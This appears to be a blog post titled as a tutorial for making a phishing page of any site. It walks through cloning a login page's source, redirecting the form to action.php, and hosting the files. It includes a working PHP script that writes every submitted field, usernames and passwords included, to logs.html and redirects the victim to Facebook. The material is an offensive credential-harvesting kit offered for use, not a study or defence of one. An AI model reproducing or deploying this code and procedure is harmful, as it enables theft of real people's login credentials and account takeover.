Make Phishing page of Any Site [TUT]
, I'm here to make a small Tutorial that how you Make Phishing Page of any Site!!
OK so lets get started...
TAKING SOURCE:
OK so lets get started...
TAKING SOURCE:
- go on the site's Login page which you will use as your Phishing page. Right click on site and Click "View Page Source" Click on the Source box and Press CTRL + A to Select all source. Now we have the page source. Now make a file name it index.php!
Making Phishing page Work:
To make phishing page work, I'll explain below.
- Make a file index.php and copy the Source code of site you want to Phish.
- Now edit the phishing page and Press CTRL + F and find action= or action
- Now Replacing the URL type action.php it might look like this:
Code:
action="action.php"
Keywords Copier:
- Now make a file call it action.php and Copy the source code below and paste in it.
Code:
<?php
header("Location: http://www.facebook.com");
$handle = fopen("logs.html", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fwrite($handle, "<hr />");
fclose($handle);
exit;
?>
- Now, make a empty file call it logs.html , Now when you are done upload these all files to your webhost open the index.php and for testing type in random username/email and pass. now open the logs.html in your site http://www.forexample.com/logs.html and you'll see all the info over there! Thats it end of tutorial ....
If you are having problem , you can watch the video of this from the below link:
I think it will be nice Tutorial...
Thanks 4 visiting my BLOG!!
No comments:
Post a Comment